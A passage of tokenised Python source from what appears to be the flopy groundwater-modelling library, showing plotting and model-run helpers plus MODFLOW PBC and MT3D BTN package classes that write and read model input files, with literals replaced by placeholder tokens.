'<STR_LIT>' in kwargs : <EOL> mflay = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> mflay = None <EOL> if '<STR_LIT>' in kwargs : <EOL> fileb = kwargs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> fileb = None <EOL> if '<STR_LIT>' in kwargs : <EOL> fext = kwargs . pop ( '<STR_LIT>' ) <EOL> fext = fext . replace ( '<STR_LIT:.>' , '<STR_LIT>' ) <EOL> else : <EOL> fext = '<STR_LIT>' <EOL> if '<STR_LIT:key>' in kwargs : <EOL> key = kwargs . pop ( '<STR_LIT:key>' ) <EOL> else : <EOL> key = None <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> axes = [ ] <EOL> ifig = <NUM_LIT:0> <EOL> if SelPackList is None : <EOL> for p in self . packagelist : <EOL> caxs = p . plot ( initial_fig = ifig , <EOL> filename_base = fileb , file_extension = fext , <EOL> kper = kper , mflay = mflay , key = key ) <EOL> if isinstance ( caxs , list ) : <EOL> for c in caxs : <EOL> axes . append ( c ) <EOL> else : <EOL> axes . append ( caxs ) <EOL> ifig = len ( axes ) + <NUM_LIT:1> <EOL> else : <EOL> for pon in SelPackList : <EOL> for i , p in enumerate ( self . packagelist ) : <EOL> if pon in p . name : <EOL> if self . verbose : <EOL> print ( '<STR_LIT>' , p . name [ <NUM_LIT:0> ] ) <EOL> caxs = p . plot ( initial_fig = ifig , <EOL> filename_base = fileb , file_extension = fext , <EOL> kper = kper , mflay = mflay , key = key ) <EOL> if isinstance ( caxs , list ) : <EOL> for c in caxs : <EOL> axes . append ( c ) <EOL> else : <EOL> axes . append ( caxs ) <EOL> ifig = len ( axes ) + <NUM_LIT:1> <EOL> break <EOL> if self . verbose : <EOL> print ( '<STR_LIT:U+0020>' ) <EOL> return axes <EOL> def to_shapefile ( self , filename , package_names = None , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> import warnings <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> self . export ( filename , package_names = package_names ) <EOL> return <EOL> def run_model ( exe_name , namefile , model_ws = '<STR_LIT>' , <EOL> silent = False , pause = False , report = False , <EOL> normal_msg = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> success = False <EOL> buff = [ ] <EOL> exe = which ( exe_name ) <EOL> if exe is None : <EOL> import platform <EOL> if platform . system ( ) in '<STR_LIT>' : <EOL> if not exe_name . lower ( ) . endswith ( '<STR_LIT>' ) : <EOL> exe = which ( exe_name + '<STR_LIT>' ) <EOL> if exe is None : <EOL> s = '<STR_LIT>' . format ( <EOL> exe_name ) <EOL> raise Exception ( s ) <EOL> else : <EOL> if not silent : <EOL> s = '<STR_LIT>' . format ( <EOL> exe ) <EOL> print ( s ) <EOL> if not os . path . isfile ( os . path . join ( model_ws , namefile ) ) : <EOL> s = '<STR_LIT>' . format ( namefile ) <EOL> raise Exception ( s ) <EOL> proc = sp . Popen ( [ exe_name , namefile ] , <EOL> stdout = sp . PIPE , cwd = model_ws ) <EOL> while True : <EOL> line = proc . stdout . readline ( ) <EOL> c = line . decode ( '<STR_LIT:utf-8>' ) <EOL> if c != '<STR_LIT>' : <EOL> if normal_msg in c . lower ( ) : <EOL> success = True <EOL> c = c . rstrip ( '<STR_LIT:\r\n>' ) <EOL> if not silent : <EOL> print ( '<STR_LIT:{}>' . format ( c ) ) <EOL> if report == True : <EOL> buff . append ( c ) <EOL> else : <EOL> break <EOL> if pause : <EOL> input ( '<STR_LIT>' ) <EOL> return success , buff </s>
<s> import numpy as np <EOL> from . . pakbase import Package <EOL> class ModflowPbc ( Package ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , model , layer_row_column_data = None , <EOL> layer_row_column_shead_ehead = None , <EOL> cosines = None , extension = '<STR_LIT>' , unitnumber = <NUM_LIT:30> , zerobase = True ) : <EOL> Package . __init__ ( self , model , extension , '<STR_LIT>' , <EOL> unitnumber ) <EOL> self . heading = '<STR_LIT>' <EOL> self . mxactp = <NUM_LIT:0> <EOL> if layer_row_column_data is None : <EOL> if layer_row_column_shead_ehead is not None : <EOL> print ( '<STR_LIT>' + '<STR_LIT>' ) <EOL> layer_row_column_data = layer_row_column_shead_ehead <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . mxactp , self . layer_row_column_data = self . assign_layer_row_column_data ( layer_row_column_data , <NUM_LIT:5> , <EOL> zerobase = zerobase ) <EOL> self . mxcos , self . cosines = self . assign_layer_row_column_data ( cosines , <NUM_LIT:3> , <EOL> zerobase = False ) <EOL> '''<STR_LIT>''' <EOL> self . np = <NUM_LIT:0> <EOL> self . parent . add_package ( self ) <EOL> def ncells ( self ) : <EOL> return self . mxactp <EOL> def write_file ( self ) : <EOL> """<STR_LIT>""" <EOL> f_pbc = open ( self . fn_path , '<STR_LIT:w>' ) <EOL> f_pbc . write ( '<STR_LIT>' % self . heading ) <EOL> f_pbc . write ( '<STR_LIT>' % ( self . mxactp , self . mxcos ) ) <EOL> for n in range ( self . parent . get_package ( '<STR_LIT>' ) . nper ) : <EOL> if ( n < len ( self . layer_row_column_data ) ) : <EOL> a = self . layer_row_column_data [ n ] <EOL> itmp = a . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> itmp = - <NUM_LIT:1> <EOL> if ( n < len ( self . cosines ) ) : <EOL> c = self . cosines [ n ] <EOL> ctmp = c . shape [ <NUM_LIT:0> ] <EOL> else : <EOL> ctmp = - <NUM_LIT:1> <EOL> f_pbc . write ( '<STR_LIT>' % ( itmp , ctmp , self . np ) ) <EOL> if ( n < len ( self . layer_row_column_data ) ) : <EOL> for b in a : <EOL> f_pbc . write ( '<STR_LIT>' % ( b [ <NUM_LIT:0> ] , b [ <NUM_LIT:1> ] , b [ <NUM_LIT:2> ] , b [ <NUM_LIT:3> ] , b [ <NUM_LIT:4> ] ) ) <EOL> if ( n < len ( self . cosines ) ) : <EOL> for d in c : <EOL> f_pbc . write ( '<STR_LIT>' % ( d [ <NUM_LIT:0> ] , d [ <NUM_LIT:1> ] , d [ <NUM_LIT:2> ] ) ) <EOL> f_pbc . close ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from . . pakbase import Package <EOL> from . . utils import Util2d , Util3d , read1d <EOL> import warnings <EOL> class Mt3dBtn ( Package ) : <EOL> """<STR_LIT>""" <EOL> unitnumber = <NUM_LIT> <EOL> def __init__ ( self , model , nlay = None , nrow = None , ncol = None , nper = None , <EOL> ncomp = <NUM_LIT:1> , mcomp = <NUM_LIT:1> , tunit = '<STR_LIT:D>' , lunit = '<STR_LIT:M>' , munit = '<STR_LIT>' , <EOL> laycon = None , delr = None , delc = None , htop = None , dz = None , <EOL> prsity = <NUM_LIT> , icbund = <NUM_LIT:1> , <EOL> sconc = <NUM_LIT:0.0> , cinact = <NUM_LIT> , thkmin = <NUM_LIT> , ifmtcn = <NUM_LIT:0> , ifmtnp = <NUM_LIT:0> , <EOL> ifmtrf = <NUM_LIT:0> , ifmtdp = <NUM_LIT:0> , savucn = True , nprs = <NUM_LIT:0> , timprs = None , <EOL> obs = None , nprobs = <NUM_LIT:1> , chkmas = True , nprmas = <NUM_LIT:1> , <EOL> perlen = None , nstp = None , tsmult = None , ssflag = None , dt0 = <NUM_LIT:0> , <EOL> mxstrn = <NUM_LIT> , ttsmult = <NUM_LIT:1.0> , ttsmax = <NUM_LIT:0> , <EOL> species_names = None , extension = '<STR_LIT>' , ** kwargs ) : <EOL> Package . __init__ ( self , model , extension , '<STR_LIT>' , self . unitnumber ) <EOL> self . setmodflowvars ( nlay , nrow , ncol , nper , laycon , delr , delc , htop , <EOL> dz , perlen , nstp , tsmult ) <EOL> self . heading1 = '<STR_LIT>' <EOL> self . heading2 = '<STR_LIT:#>' <EOL> self . ncomp = ncomp <EOL> self . mcomp = mcomp <EOL> self . tunit = tunit <EOL> self . lunit = lunit <EOL> self . munit = munit <EOL> self . cinact = cinact <EOL> self . thkmin = thkmin <EOL> self . ifmtcn = ifmtcn <EOL> self . ifmtnp = ifmtnp <EOL> self . ifmtrf = ifmtrf <EOL> self . ifmtdp = ifmtdp <EOL> self . savucn = savucn <EOL> self . nprs = nprs <EOL> self . timprs = timprs <EOL> self . obs = obs <EOL> self . nprobs = nprobs <EOL> self . chkmas = chkmas <EOL> self . nprmas = nprmas <EOL> if species_names is None : <EOL> species_names = [ ] <EOL> self . species_names = species_names <EOL> self . prsity = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , <EOL> np . float32 , prsity , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . icbund = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , np . int , <EOL> icbund , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . ssflag = ssflag <EOL> self . dt0 = Util2d ( model , ( self . nper , ) , np . float32 , dt0 , name = '<STR_LIT>' ) <EOL> self . mxstrn = Util2d ( model , ( self . nper , ) , np . int , mxstrn , <EOL> name = '<STR_LIT>' ) <EOL> self . ttsmult = Util2d ( model , ( self . nper , ) , np . float32 , ttsmult , <EOL> name = '<STR_LIT>' ) <EOL> self . ttsmax = Util2d ( model , ( self . nper , ) , np . float32 , ttsmax , <EOL> name = '<STR_LIT>' ) <EOL> self . sconc = [ ] <EOL> u3d = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , np . float32 , <EOL> sconc , name = '<STR_LIT>' , locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . sconc . append ( u3d ) <EOL> if ncomp > <NUM_LIT:1> : <EOL> for icomp in range ( <NUM_LIT:2> , ncomp + <NUM_LIT:1> ) : <EOL> name = "<STR_LIT>" + str ( icomp ) <EOL> val = <NUM_LIT:0.0> <EOL> if name in kwargs : <EOL> val = kwargs . pop ( name ) <EOL> else : <EOL> print ( "<STR_LIT>" + <EOL> str ( icomp ) + "<STR_LIT>" + <EOL> name ) <EOL> u3d = Util3d ( model , ( self . nlay , self . nrow , self . ncol ) , <EOL> np . float32 , val , name = name , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . sconc . append ( u3d ) <EOL> if len ( list ( kwargs . keys ( ) ) ) > <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" + <EOL> '<STR_LIT:U+0020>' . join ( list ( kwargs . keys ( ) ) ) ) <EOL> self . parent . add_package ( self ) <EOL> return <EOL> def setmodflowvars ( self , nlay , nrow , ncol , nper , laycon , delr , delc , htop , <EOL> dz , perlen , nstp , tsmult ) : <EOL> '''<STR_LIT>''' <EOL> validmfdis = True <EOL> try : <EOL> dum = self . parent . mf . dis . nlay <EOL> except : <EOL> validmfdis = False <EOL> mfvarlist = [ nlay , nrow , ncol , nper , laycon , delr , delc , htop , dz , <EOL> perlen , nstp , tsmult ] <EOL> if not validmfdis : <EOL> for v in mfvarlist : <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> if v is None : <EOL> raise Exception ( s ) <EOL> if nlay is not None : <EOL> self . nlay = nlay <EOL> else : <EOL> self . nlay = self . parent . mf . dis . nlay <EOL> if nrow is not None : <EOL> self . nrow = nrow <EOL> else : <EOL> self . nrow = self . parent . mf . dis . nrow <EOL> if ncol is not None : <EOL> self . ncol = ncol <EOL> else : <EOL> self . ncol = self . parent . mf . dis . ncol <EOL> if nper is not None : <EOL> self . nper = nper <EOL> else : <EOL> self . nper = self . parent . mf . dis . nper <EOL> nlay = self . nlay <EOL> nrow = self . nrow <EOL> ncol = self . ncol <EOL> nper = self . nper <EOL> if delr is not None : <EOL> self . delr = Util2d ( self . parent , ( ncol , ) , np . float32 , delr , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . delr = Util2d ( self . parent , ( ncol , ) , np . float32 , <EOL> self . parent . mf . dis . delr . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if delc is not None : <EOL> self . delc = Util2d ( self . parent , ( nrow , ) , np . float32 , delc , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . delc = Util2d ( self . parent , ( nrow , ) , np . float32 , <EOL> self . parent . mf . dis . delc . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if htop is not None : <EOL> self . htop = Util2d ( self . parent , ( nrow , ncol ) , np . float32 , htop , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . htop = Util2d ( self . parent , ( nrow , ncol ) , np . float32 , <EOL> self . parent . mf . dis . top . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if dz is not None : <EOL> self . dz = Util3d ( self . parent , ( nlay , nrow , ncol ) , np . float32 , dz , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> thickness = self . parent . mf . dis . thickness . get_value ( ) <EOL> self . dz = Util3d ( self . parent , ( nlay , nrow , ncol ) , np . float32 , <EOL> thickness , name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if perlen is not None : <EOL> self . perlen = Util2d ( self . parent , ( nper , ) , np . float32 , perlen , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . perlen = Util2d ( self . parent , ( nper , ) , np . float32 , <EOL> self . parent . mf . dis . perlen . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if nstp is not None : <EOL> self . nstp = Util2d ( self . parent , ( nper , ) , np . int , nstp , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . nstp = Util2d ( self . parent , ( nper , ) , np . int , <EOL> self . parent . mf . dis . nstp . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> if tsmult is not None : <EOL> self . tsmult = Util2d ( self . parent , ( nper , ) , np . float32 , tsmult , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> self . tsmult = Util2d ( self . parent , ( nper , ) , np . float32 , <EOL> self . parent . mf . dis . tsmult . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> self . laycon = None <EOL> if laycon is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , laycon , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> flow_package = self . parent . mf . get_package ( '<STR_LIT>' ) <EOL> if flow_package is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , <EOL> flow_package . laycon . get_value ( ) , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> else : <EOL> flow_package = self . parent . mf . get_package ( '<STR_LIT>' ) <EOL> if flow_package is not None : <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , <EOL> np . int , flow_package . laytyp . get_value ( ) , <EOL> name = '<STR_LIT>' , locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> s = '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> s += '<STR_LIT>' <EOL> if self . laycon is None : <EOL> warnings . warn ( s ) <EOL> self . laycon = Util2d ( self . parent , ( nlay , ) , np . int , <NUM_LIT:1> , <EOL> name = '<STR_LIT>' , <EOL> locat = self . unit_number [ <NUM_LIT:0> ] ) <EOL> return <EOL> def write_file ( self ) : <EOL> """<STR_LIT>""" <EOL> f_btn = open ( self . fn_path , '<STR_LIT:w>' ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . heading1 , self . heading2 ) ) <EOL> f_btn . write ( '<STR_LIT>' <EOL> . format ( self . nlay , self . nrow , self . ncol , self . nper , <EOL> self . ncomp , self . mcomp ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . tunit , self . lunit , self . munit ) ) <EOL> if ( self . parent . adv != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . dsp != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . ssm != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . rct != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> if ( self . parent . gcg != None ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:T>' ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( '<STR_LIT:F>' ) ) <EOL> f_btn . write ( '<STR_LIT:\n>' ) <EOL> self . laycon . set_fmtin ( '<STR_LIT>' ) <EOL> f_btn . write ( self . laycon . string ) <EOL> f_btn . write ( self . delr . get_file_entry ( ) ) <EOL> f_btn . write ( self . delc . get_file_entry ( ) ) <EOL> f_btn . write ( self . htop . get_file_entry ( ) ) <EOL> f_btn . write ( self . dz . get_file_entry ( ) ) <EOL> f_btn . write ( self . prsity . get_file_entry ( ) ) <EOL> f_btn . write ( self . icbund . get_file_entry ( ) ) <EOL> for s in range ( len ( self . sconc ) ) : <EOL> f_btn . write ( self . sconc [ s ] . get_file_entry ( ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . cinact , self . thkmin ) ) <EOL> f_btn . write ( '<STR_LIT>' . format ( self . ifmtcn , self . ifmtnp , self . ifmtrf , self . ifmtdp ) ) <EOL> if ( self . savucn == True ) : <EOL> ss = '<STR_LIT:T>' <EOL> else : <EOL> ss = '<STR_LIT:F>' <EOL> f_btn . write ( '<STR_LIT>' . format ( ss ) ) <EOL> if self . timprs is None : <EOL> f_btn . write ( '<STR_LIT>' . format ( self . nprs ) ) <EOL> else : <EOL> f_btn . write ( '<STR_LIT>' . format ( len ( self . timprs ) ) ) <EOL> timprs = Util2d ( self . parent , ( len ( self . timprs ) , ) , <EOL> np . float32 , self . timprs , name = '<STR_LIT>' , <EOL> fmtin = '<STR_LIT>' ) <EOL> timprs . format . fortran = '<STR_LIT>' <EOL> f_btn . write ( timprs . string ) <EOL> if self . obs is None : <EOL> f_btn . write ( '<STR_LIT>' . format ( <NUM_LIT:0> , self . nprobs ) ) <EOL> else : <EOL> nobs = self . obs . shape [ <NUM_LIT:0> ] <EOL> f_btn . write ( '<STR_LIT>' . format ( nobs , self . nprobs ) ) <EOL> for r in range ( nobs ) : <EOL> f_btn . write ( '<STR_LIT>' . format ( self . obs [ r , <NUM_LIT:0> ] , self . obs [ r , <NUM_LIT:1> ] , <EOL> self . obs [ r , <NUM_LIT:2> ] ) ) <EOL> if ( self . chkmas == True ) : <EOL> ss = '<STR_LIT:T>' <EOL> else : <EOL> ss = '<STR_LIT:F>' <EOL> f_btn . write ( '<STR_LIT>' . format ( ss , self . nprmas ) ) <EOL> for t in range ( self . nper ) : <EOL> s = '<STR_LIT>' . format ( self . perlen [ t ] , <EOL> self . nstp [ t ] , <EOL> self . tsmult [ t ] ) <EOL> if self . ssflag is not None : <EOL> s += '<STR_LIT:U+0020>' + self . ssflag [ t ] <EOL> s += '<STR_LIT:\n>' <EOL> f_btn . write ( s ) <EOL> f_btn . write ( '<STR_LIT>' <EOL> . format ( self . dt0 [ t ] , self . mxstrn [ t ] , <EOL> self . ttsmult [ t ] , self . ttsmax [ t ] ) ) <EOL> f_btn . close ( ) <EOL> return <EOL> @ staticmethod <EOL> def load ( f , model , ext_unit_dict = None ) : <EOL> if not hasattr ( f , '<STR_LIT>' ) : <EOL> filename = f <EOL> f = open ( filename , '<STR_LIT:r>' ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( line . strip ( ) ) ) <EOL> line = f . readline ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( line . strip ( ) ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> nlay = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> nrow = int ( line [ <NUM_LIT:11> : <NUM_LIT:20> ] ) <EOL> ncol = int ( line [ <NUM_LIT> : <NUM_LIT:30> ] ) <EOL> nper = int ( line [ <NUM_LIT> : <NUM_LIT> ] ) <EOL> try : <EOL> ncomp = int ( line [ <NUM_LIT> : <NUM_LIT:50> ] ) <EOL> except : <EOL> ncomp = <NUM_LIT:1> <EOL> try : <EOL> mcomp = int ( line [ <NUM_LIT> : <NUM_LIT> ] ) <EOL> except : <EOL> mcomp = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nlay ) ) <EOL> print ( '<STR_LIT>' . format ( nrow ) ) <EOL> print ( '<STR_LIT>' . format ( ncol ) ) <EOL> print ( '<STR_LIT>' . format ( nper ) ) <EOL> print ( '<STR_LIT>' . format ( ncomp ) ) <EOL> print ( '<STR_LIT>' . format ( mcomp ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> tunit = line [ <NUM_LIT:0> : <NUM_LIT:4> ] <EOL> lunit = line [ <NUM_LIT:4> : <NUM_LIT:8> ] <EOL> munit = line [ <NUM_LIT:8> : <NUM_LIT:12> ] <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( tunit ) ) <EOL> print ( '<STR_LIT>' . format ( lunit ) ) <EOL> print ( '<STR_LIT>' . format ( munit ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> trnop = f . readline ( ) [ : <NUM_LIT:20> ] . strip ( ) . split ( ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( trnop ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> laycon = np . empty ( ( nlay ) , np . int ) <EOL> laycon = read1d ( f , laycon ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( laycon ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> delr = Util2d . load ( f , model , ( ncol , <NUM_LIT:1> ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( delr ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> delc = Util2d . load ( f , model , ( nrow , <NUM_LIT:1> ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( delc ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> htop = Util2d . load ( f , model , ( nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( htop ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> dz = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( dz ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> prsity = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( prsity ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> icbund = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . int , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( icbund ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> kwargs = { } <EOL> sconc = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , '<STR_LIT>' , <EOL> ext_unit_dict ) <EOL> if ncomp > <NUM_LIT:1> : <EOL> for icomp in range ( <NUM_LIT:2> , ncomp + <NUM_LIT:1> ) : <EOL> name = "<STR_LIT>" + str ( icomp ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( name ) ) <EOL> u3d = Util3d . load ( f , model , ( nlay , nrow , ncol ) , np . float32 , <EOL> name , ext_unit_dict ) <EOL> kwargs [ name ] = u3d <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( sconc ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> cinact = float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> try : <EOL> thkmin = float ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> thkmin = <NUM_LIT> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( cinact ) ) <EOL> print ( '<STR_LIT>' . format ( thkmin ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> ifmtcn = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> ifmtnp = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> ifmtrf = int ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) <EOL> ifmtdp = int ( line [ <NUM_LIT:30> : <NUM_LIT> ] ) <EOL> savucn = False <EOL> if '<STR_LIT:t>' in line [ <NUM_LIT> : <NUM_LIT:50> ] . lower ( ) : <EOL> savucn = True <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( ifmtcn ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtnp ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtrf ) ) <EOL> print ( '<STR_LIT>' . format ( ifmtdp ) ) <EOL> print ( '<STR_LIT>' . format ( savucn ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> nprs = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nprs ) ) <EOL> timprs = None <EOL> if nprs > <NUM_LIT:0> : <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> timprs = np . empty ( ( nprs ) , dtype = np . float32 ) <EOL> read1d ( f , timprs ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( timprs ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> nobs = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> try : <EOL> nprobs = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> nprobs = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( nobs ) ) <EOL> print ( '<STR_LIT>' . format ( nprobs ) ) <EOL> obs = None <EOL> if nobs > <NUM_LIT:0> : <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> obs = [ ] <EOL> for l in range ( nobs ) : <EOL> line = f . readline ( ) <EOL> k = int ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) <EOL> i = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> j = int ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) <EOL> obs . append ( [ k , i , j ] ) <EOL> obs = np . array ( obs ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( obs ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> line = f . readline ( ) <EOL> chkmas = False <EOL> if '<STR_LIT:t>' in line [ <NUM_LIT:0> : <NUM_LIT:10> ] . lower ( ) : <EOL> chkmas = True <EOL> try : <EOL> nprmas = int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) <EOL> except : <EOL> nprmas = <NUM_LIT:1> <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' . format ( chkmas ) ) <EOL> print ( '<STR_LIT>' . format ( nprmas ) ) <EOL> if model . verbose : <EOL> print ( '<STR_LIT>' ) <EOL> dt0 , mxstrn , ttsmult , ttsmax = [ ] , [ ] , [ ] , [ ] <EOL> perlen = [ ] <EOL> nstp = [ ] <EOL> tsmult = [ ] <EOL> tslngh = [ ] <EOL> ssflag = [ ] <EOL> for kper in range ( nper ) : <EOL> line = f . readline ( ) <EOL> perlen . append ( float ( line [ <NUM_LIT:0> : <NUM_LIT:10> ] ) ) <EOL> nstp . append ( int ( line [ <NUM_LIT:10> : <NUM_LIT:20> ] ) ) <EOL> tsmult . append ( float ( line [ <NUM_LIT:20> : <NUM_LIT:30> ] ) ) <EOL> sf = '<STR_LIT:U+0020>' <EOL> ll = line [ <NUM_LIT:30> : ] . strip ( ) . split ( ) <EOL> if len ( ll ) > <NUM_LIT:0> : 